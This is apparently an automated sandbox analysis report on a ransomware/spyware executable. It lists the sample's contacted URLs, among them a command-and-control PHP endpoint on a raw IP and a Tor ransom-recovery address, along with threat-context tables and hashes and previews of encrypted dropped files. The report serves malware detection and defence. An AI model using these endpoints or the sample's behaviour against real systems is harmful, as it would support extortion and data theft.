    http://api.ipify.org/2b7cu0KwZl.exe, 00000000.00000003.1805381540.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1804619437.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1805035456.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1819160509.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1808182808.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1808323206.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmpfalse
      		high
      http://193.143.1.139/Ujdu8jjooue/biweax.php2b7cu0KwZl.exefalse
      • Avira URL Cloud: safe
      		unknown
      http://api.ipify.orgunknown------------------------multipart/form-data;2b7cu0KwZl.exefalse
      • Avira URL Cloud: safe
      		unknown
      http://193.143.1.139/9U62b7cu0KwZl.exe, 00000000.00000003.1821529749.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1832275770.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825034317.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1833404082.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829943691.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1831719140.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830337644.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827170187.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829430448.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1832820189.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828747196.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829036005.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830881739.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825604403.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1821872031.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830557344.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1833273656.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828885190.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827723636.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1822607000.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1820251351.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzORECOVERY INFO.txt62.0.dr, RECOVERY INFO.txt283.0.dr, RECOVERY INFO.txt37.0.dr, RECOVERY INFO.txt10.0.dr, RECOVERY INFO.txt196.0.dr, RECOVERY INFO.txt304.0.dr, RECOVERY INFO.txt153.0.dr, RECOVERY INFO.txt89.0.dr, RECOVERY INFO.txt257.0.dr, RECOVERY INFO.txt155.0.dr, RECOVERY INFO.txt56.0.dr, RECOVERY INFO.txt52.0.dr, RECOVERY INFO.txt275.0.dr, RECOVERY INFO.txt115.0.dr, RECOVERY INFO.txt253.0.dr, RECOVERY INFO.txt106.0.dr, RECOVERY INFO.txt17.0.dr, RECOVERY INFO.txt111.0.dr, RECOVERY INFO.txt46.0.dr, RECOVERY INFO.txt66.0.dr, RECOVERY INFO.txt42.0.drtrue
      • Avira URL Cloud: safe
      		unknown
      http://api.ipify.org/62b7cu0KwZl.exe, 00000000.00000003.1817076512.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1822753296.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1804503862.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1819426905.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1822334255.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1805117359.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://dmd-ca-beta2/CertEnroll/dmd-ca-beta2_Microsoft%20Digital%20Media%20Authority%202005.crt0d2b7cu0KwZl.exe, 00000000.00000003.1852408139.000001F7CBE26000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1852516311.000001F7CA886000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://193.143.1.139/Ujdu8jjooue/biweax.php12b7cu0KwZl.exe, 00000000.00000003.1820251351.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1820510829.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://dmd-ca-beta2/CertEnroll/Microsoft%20Digital%20Media%20Authority%202005.crl2b7cu0KwZl.exe, 00000000.00000003.1852408139.000001F7CBE26000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1852516311.000001F7CA886000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://193.143.1.139/2b7cu0KwZl.exe, 00000000.00000003.1821529749.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825034317.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827170187.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829430448.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828747196.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829036005.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825604403.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1821872031.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828885190.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827723636.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1822607000.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1820251351.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1820510829.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827950839.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828495183.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1823027740.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://193.143.1.139/Ujdu8jjooue/biweax.php1y62b7cu0KwZl.exe, 00000000.00000003.1821529749.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1832275770.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825034317.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1833404082.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829943691.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1831719140.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830337644.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827170187.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829430448.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1832820189.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828747196.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829036005.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830881739.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825604403.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1821872031.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830557344.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1833273656.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828885190.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827723636.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1822607000.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1820251351.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://api.ipify.org2b7cu0KwZl.exefalse
        		high

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        193.143.1.139
        		unknownunknown
        		57271BITWEB-ASRUfalse
        104.26.13.205
        		api.ipify.orgUnited States
        		13335CLOUDFLARENETUSfalse

        General Information

        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1548500
        Start date and time:2024-11-04 15:20:08 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 7m 22s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:11
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:2b7cu0KwZl.exe
        renamed because original name is a hash value
        Original Sample Name:e21cbdbf6414ffc0ef4175295c7e188800a66b7b83302bd35b7e3fd6fabfccde.exe
        Detection:MAL
        Classification:mal84.rans.spre.spyw.evad.winEXE@1/1281@1/2
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .exe

        Warnings

        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
        • Report size getting too big, too many NtCreateFile calls found.
        • Report size getting too big, too many NtCreateKey calls found.
        • Report size getting too big, too many NtDeleteValueKey calls found.
        • Report size getting too big, too many NtEnumerateValueKey calls found.
        • Report size getting too big, too many NtOpenFile calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtReadFile calls found.
        • Report size getting too big, too many NtSetInformationFile calls found.
        • Report size getting too big, too many NtSetValueKey calls found.
        • Report size getting too big, too many NtWriteFile calls found.
        • VT rate limit hit for: 2b7cu0KwZl.exe

        Simulations

        Behavior and APIs

        TimeTypeDescription
        09:21:12API Interceptor4x Sleep call for process: 2b7cu0KwZl.exe modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        193.143.1.139Zc9eO57fgF.elfGet hashmaliciousUnknownBrowse
        • 193.143.1.139/Ujdu8jjooue/biweax.php
        104.26.13.205file.exeGet hashmaliciousUnknownBrowse
        • api.ipify.org/
        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
        • api.ipify.org/
        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
        • api.ipify.org/
        file.exeGet hashmaliciousRDPWrap ToolBrowse
        • api.ipify.org/
        Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
        • api.ipify.org/
        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
        • api.ipify.org/
        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
        • api.ipify.org/
        file.exeGet hashmaliciousUnknownBrowse
        • api.ipify.org/
        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
        • api.ipify.org/
        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
        • api.ipify.org/

        Domains

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        api.ipify.orgZc9eO57fgF.elfGet hashmaliciousUnknownBrowse
        • 172.67.74.152
        Payslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
        • 172.67.74.152
        Quotation.exeGet hashmaliciousAgentTeslaBrowse
        • 104.26.13.205
        Copia de pago de la Orden de compra OI16014 y OI16015.exeGet hashmaliciousAgentTeslaBrowse
        • 104.26.12.205
        QUOTATION#09678.exeGet hashmaliciousAgentTeslaBrowse
        • 172.67.74.152
        Payslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
        • 104.26.13.205
        V7FWuG5Lct.exeGet hashmaliciousQuasarBrowse
        • 172.67.74.152
        7ll96oOSBF.exeGet hashmaliciousQuasarBrowse
        • 104.26.12.205
        Payload 94.75 (4).225.exeGet hashmaliciousKronos, Strela StealerBrowse
        • 104.26.12.205
        Ordine d'acquisto OI16014 e OI1601.exeGet hashmaliciousAgentTeslaBrowse
        • 104.26.12.205

        ASNs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        CLOUDFLARENETUSPurchase order.exeGet hashmaliciousMassLogger RATBrowse
        • 188.114.96.3
        Zc9eO57fgF.elfGet hashmaliciousUnknownBrowse
        • 172.67.74.152
        Quote_General_Tech_LLC_637673,PDF.exeGet hashmaliciousFormBookBrowse
        • 188.114.96.3
        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
        • 104.21.5.155
        e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
        • 188.114.96.3
        jCN22OTVxq.lnkGet hashmaliciousUnknownBrowse
        • 104.21.73.244
        Cxn80OsiM7.lnkGet hashmaliciousUnknownBrowse
        • 104.21.73.244
        r96vfq6E6O.lnkGet hashmaliciousUnknownBrowse
        • 172.67.193.120
        MvUoLtpUWG.lnkGet hashmaliciousUnknownBrowse
        • 172.67.193.120
        IFeOeQQTXe.lnkGet hashmaliciousUnknownBrowse
        • 172.67.193.120
        BITWEB-ASRUZc9eO57fgF.elfGet hashmaliciousUnknownBrowse
        • 193.143.1.139
        https://caraccidentdefencelawyer.com/LBKQgs7C#3l3f816z5y810bbd3w5muypm6py7liz04w39Get hashmaliciousGRQ ScamBrowse
        • 193.143.1.195
        mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
        • 193.143.1.59
        IWnUKXop2x.elfGet hashmaliciousMirai, OkiruBrowse
        • 193.143.1.59
        LNLAncf2v5.elfGet hashmaliciousMirai, OkiruBrowse
        • 193.143.1.59
        x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
        • 193.143.1.59
        x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
        • 193.143.1.59
        arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
        • 193.143.1.59
        arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
        • 193.143.1.59
        h3G4uG7Kqi.elfGet hashmaliciousMiraiBrowse
        • 45.133.217.107

        JA3 Fingerprints

        No context

        Dropped Files

        No context

        Created / dropped Files

        C:\Documents and Settings\All Users\.curlrc.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):144
        Entropy (8bit):5.712669806105628
        Encrypted:false
        SSDEEP:3:PWDKk/3ll/lsltlCs6QyI6NhqOXB20GF6ubk9Hyc00WAn:PWiSPjI6NhbBR9ScPWA
        MD5:E498E100DBB0BD5C55B74D7B416F9211
        SHA1:35630131E41221611C2A6268B4173DF09AC85FB1
        SHA-256:3C678174EF610EAE08C1F595CC2DA676883844B929F4ED4735EF3730C5D44709
        SHA-512:4C3E30013807CA07E5B71DCDFC475214963D4F4C27E3E66D0E1CB5515443C02203169F528CE146C92EA13CD9A3052AA198E3A1170C6D42B6B07E0313B41CD2C5
        Malicious:false
        Reputation:low
        Preview:.%Y.3..^.!2A........(...........................W...2.....W..p.22..d.U4.|.S!f..Mp.i(+.(....'hy.TK.........m.J.iJ..5.C.....j.b.p...5uD3$.

        C:\Documents and Settings\All Users\Desktop\Adobe Acrobat.lnk.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):2197
        Entropy (8bit):7.894051049135353
        Encrypted:false
        SSDEEP:48:W5LnOo6U3pIi956BkzSFDf5mo2M/XIED2zbSeLdIG35l3h:26ipJ956kSz8CkzbS+B35D
        MD5:0777654C4B56C4E597DF360DDF16254B
        SHA1:CB33404A3B4FC9E866C743186E7F9E951405A576
        SHA-256:9DA3C107D8E0C8DB54867A6FB07AAB1A3990C54E13D373A869BA52A2B3A79F3F
        SHA-512:0114ED62E586B5F0C9CD07A04E1F006773367D9D7865C5033CA39CB5C4C7D893A31A4F6FBA4B1D716D2F3ED34D7C4879012F073B1E69D24BE5D0C19380F404C6
        Malicious:false
        Reputation:low
        Preview:{O..y.9.....f.ix.5...n<5kMb~z).B.d....F<.........u..!.f.5?{U....A."..E;)..'...}}....N..*...j..P6.@.6.T.?......0w7.U..U..cz^..K..U..6m..........0.q..pm.m.BDP.Z.4nt.. .gp.G.....U..R..h..Y.].W.....l.........H..=..F.N.VpN.R.VU.X......1..3,..nG<.....bNV.2.:b.8.kw.n..Ef..K...3Y._...w...k.~..K.......T.s;!hm.-(...t....{....3.M.C-...J...ynYP...vD.....>%..-}"......../..Z.^....E.h.S....E`..nw..../?...Y......?.@.....1qX..C....T..7t..Kh.e.s5zC.7<....:.4.. ..'M@.F.A.....{...>.~.....o...OV2.gr...z.'..UW%.+xwiH..' qX.Ai.a.TfY..KM.u.).:!Y.Ev..&.(.U.*.{..9.WRi'b..6.b.O...hWt8.a..3............y...^.DD....*..W.Nw..v...u.M......T..3.~...oCEeT.V.r.;n..bX.P...)Z.I..... .^...._.....=.=.FX......5..R..}z....^..J.C\."..&.a\..)...x.F"~?}...";X....."q~..sD...9#...U.._._.....;.>w.s.....I.......1.. .....8+...:..._S....!]......=....W........F6.ns........y...mL..$.z....R.A3H..I..$<.?.d.Gx.i......./.\.N5..l..Ld..FP....4r.$'...p...P.......{.<+3...R.+....Z(.F.weD..@....

        C:\Documents and Settings\All Users\Desktop\Firefox.lnk.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):1129
        Entropy (8bit):7.750744293825918
        Encrypted:false
        SSDEEP:24:0iwalZRCkuTRQ9+NHsggcaQpJ6EO5RcRVLyWGAf2w20iSkWA:HZR4dQ9+NHnjXpYX5k1q0Bi/h
        MD5:1149F2F66505B7B774B62C6A3A2F3BF6
        SHA1:7EFAA935C75C16507D04A0B4B824BF61146E9B27
        SHA-256:D17018973D60C188408DB52DE83E80BCF48E738903394F16EAD1465D423920CF
        SHA-512:D2BD9E3171B36606FCFE6A77F521D9688B7ECBB70D1559CEA00C8EAC417E8CD79B8E79ADF02B8214F8C70AEC8DA558380A1FF3E1863D6BE3A94F760715F8ED77
        Malicious:false
        Reputation:low
        Preview:n...9...2..N.....D.<_yz....}................A....%..9...{-.h.aD..*...e.H.j..0....c...<..y.1H.A.zO).#h...!;..A..l.0"w...2....OB......z.M.l.Q:[..E)_..n........\.....F..`aS..lZd.Q..V../>..P.(Mxb...1D.*..`d_a.....r.....zQF%O+..:\...&iJ/8T......F..+....o..IJ...!..[..9Q.ih./.K...yNd..|.i.X..U=...-..I.B|....6..K.+?4I...."F).~xU.C.Wr.{...5.H........M..0m.[..".i...7<.... ..'.. ....E,....9...M..+>v..!1......$@.[...a.Xy....1..H.>..}....?.L0IM=.j.z..#[..Yq...]R.j...$vN..J....I`.5.....a....04..jl....M.7.^..g...H..Z.........T....y.c.s..R........?1}.o....ruf.Bh..L.N.lh..LZ......Ys....[.. .M...eZ...N..uG..R.f..Q .F........^s.K.G.{....?O.....yQ.%....q.......;~.}.D.....D....1r.O|.a..4..&...Cg..8.-.Jgc.>.c.S......_lQBi...3IH..m..;...X.c].l.Y....`?...i-.k]..... ..O..#/*....:&(.l....6..\.(K...&...>.m.yG.EYi>..T.uU.PW...Mt6t'x{2K.'.p.....Q..Z.t..I.&..s...[..'..I.G...=.FI.q..P.Q..mQDh|...m.c.X}`.5E.7..oGP\,A.....'.ZZJn.\..\e..y.<.=.w./.'=.V^C.i...8.O..!2A...

        C:\Documents and Settings\All Users\Desktop\Google Chrome.lnk.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):2488
        Entropy (8bit):7.921937507243424
        Encrypted:false
        SSDEEP:48:ryqkbeV46y6SZDFG2ldwsLoZFuVJmooXlY5A6EWf7UGFD5zh:B95hS98sLoX0JmooXuZEWfwGFD7
        MD5:294225C4325C27F79E1DAE51C8B3565E
        SHA1:2B3A952F2F66618202C41BC49E92965779C0D87F
        SHA-256:518C848B64E814ED3354ADE9E291A5881BF93380676F66E4F1624D80F85EFB10
        SHA-512:FF6F5689F13231977921FB282E17884C21CA9867B8F0F52584DE973939EA12A1578C1F880F12D44D04BCBC5E20CA4F92594CF63EC360AC2D0434C3CE96541EE0
        Malicious:false
        Reputation:low
        Preview:"....`v..G.i..;.S.....hmR..H.z#.......D83..P..S6|....e..b=!.D....jM....D..a...|.$......Xq!6.............F.K.\$~RS..d.(G.2|s... .i.N........"..P.m 6p....4... ..*0.%.v..{.~...nu..Dw{.g&:*..z...S.\.m......[.+.u........k.%y.9..j.._.9.Y.>......1.Sh.k......m..}...t.%.rRA5(......Rz.U.M?..||.....*.%....N...%..=._...?.1R..;l..A..\.iK./b...k...:1..p.....(..m[P&;.n.]t!.....C..(.?..........YK......4...5......;.'...s.NN.2,.^...9K2..m....e..6...;c.....o.s7.dX.V8.8...?.x...}.9...<o..d......q&;.."..a4.l9.\7........./...i...m.<..{|.....:M.M..po..2..\..(..@X....Y....[..87J.I..BM._...-v..7-..#D......C].......L=2..n..#)G...)..OF.....].....o*V..G.D..o]\..SD.bH..4g.3..~z..or..^....%3..|.F..^...mY.7...S9...s...O.Ad..{..0.NN.>$...\.e..}.+...T.l."..KQ.(k.J..u#H..... .....g1....$f.xi.t#6s....B...w.N.2.:N/.-..-|.......A....h.w...^.....)........[<A....+j.5,.......I.c./k~3.M>..oz.-..d...Q...."X..7b#..pI#..w.;].sl..~.:d}....Y7$ ....m.'v..>..n.....<8.j..Y.&..^..~v.f..?..*

        C:\Documents and Settings\All Users\Microsoft OneDrive\setup\refcount.ini.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:OpenPGP Secret Key
        Category:dropped
        Size (bytes):161
        Entropy (8bit):5.996356020119966
        Encrypted:false
        SSDEEP:3:/2SzFksvKll3ll/lsl0lePUD87wefziO5d50wdTziubk9Hyc00WAn:+ArceS8zztDKwdTk9ScPWA
        MD5:0BC43BE3EF33B7BEFDF557E3CD8E9828
        SHA1:4B0554DE157CC4486D88A16206AFC12AA5D968A1
        SHA-256:C1E6AEAA1062372B0C4D6C894E188557C2D843109586FF4F4C2622B68F7F118D
        SHA-512:41ED4F608098EB12BBC568C29876F1E620C48C1CB742E9B6233AD0C95C7003D1678ECDD7C639A5DD8A58F6FB9411970F2821689798822B48CD1D0F8FC5952910
        Malicious:false
        Reputation:low
        Preview:..6..P..[...}M..t...9.CH..!2A........(............................w...?*.~.M&.Ep&..^.K&....z.8....J..sXM..5.0....o.p.......m.J.iJ..5.C.....j.b.p...5uD3$.

        C:\Documents and Settings\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):5104
        Entropy (8bit):7.960182155604478
        Encrypted:false
        SSDEEP:96:dJQmmnoE9g1wcUCfIzBAyBH+vprSSdMaoXY5/CSOSfb/xCRHx2wba:rQmmnyycUkyBuprJK5Y5/CYfbM2wba
        MD5:4C85C383B5222CC54CBB8A5054D0FF0B
        SHA1:F700120C1493D4EBDED881358E91E21F57552250
        SHA-256:3D4CAF33C82EC70F55BBAC62C38A7E79AA92B736B7E57A45FB07C7921531D6BD
        SHA-512:ED6C86B40D25F21ACDD641C159401AB0029442F7871482757E4CFA7771BFFA43B8BB3677D66895EB8A5375BE091A02FB2630124FBD52CBDF05A0926AE28CDA62
        Malicious:false
        Reputation:low
        Preview:<.F6..T.M..9.._._.....wtv].C[.8T.......k.B...|.t9...$...c.\../.c.iZ...t...L)7dyo!sH...r.*)R...0.6.k.r..7.O..U.'(wU{./.r..g.3i...g...e8.k.mr1.]..p.]..Z..v...Kg...\.Y....1....r....#..}...p.O...#.y.....lq..&..)..K*K.\o+....[@.bnb......G..d,2.'w..GE.f............y.a.B.......a...g.QsuR..n..wm.E6...qB....YI.g....=..g!.b...&=7.2.[H.O..V.....e....!.......OX:.U...^c.2]Z?..../H.]5....n....[..h#bE.....B$........m..5..W...S.....#.......r....}.$+]pnjZKaO=.>..&...e.....E..\0.....m......$....^W.*../....%.3....6...%H....#.0....9.ks......:.....To.d......5T=.H...1.MJx...A......O...h...F...h.o...6..d..........]...3......)/~..I..VY.lk.....w,.w..${\?n....y...=..zS|........O..^5b5..[..[?.}$.P>.o..d.$...X.NiX.Sp..6.{....z.1.Su..d....M...Xx.C...I......Y3+......c3h..w.....8..H.<t.a\.#..2..a...9....x...x..M.t..Y.....V...........s.O. EU.+C...^.,.J.....u.0Q.hb...+..8..B....5-..J>EeW,.}..9.n..e.nI..8.uZ.y......lRjv..GT.FMa....el)...4..,...aP.3..5.Q. ..V3)du;...}.....

        C:\Documents and Settings\All Users\Microsoft\ClickToRun\DeploymentConfig.1.xml.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):1518
        Entropy (8bit):7.835759705636313
        Encrypted:false
        SSDEEP:24:12V5DYJNs5W+/HVSQsf7mUE3+YwH/iShv2AuClI3URrMUHEGbbcLMdkfSI4PWA:1S5DqGl/HFsjmUE3vwK+vWClI3iXHvb/
        MD5:ADDD85AFCBEBFE0CCDB386EDA4BDDF89
        SHA1:9AFFB2C66AB2A5112B1AE87BB5C5055180DCB234
        SHA-256:E6A96EAD98DF43626A8E07A37D517747221EE4E912350EDB72F65074E4DFA1A4
        SHA-512:517BBAEF4AC8376BC032077739A5719713F8EC666BB5D2A10A7DE4A93D76E2C1CD4A3A185D8F3D7CEA3D4E3821E96F37A99E1A8E3C4C412FF34DA6BB51892B62
        Malicious:false
        Reputation:low
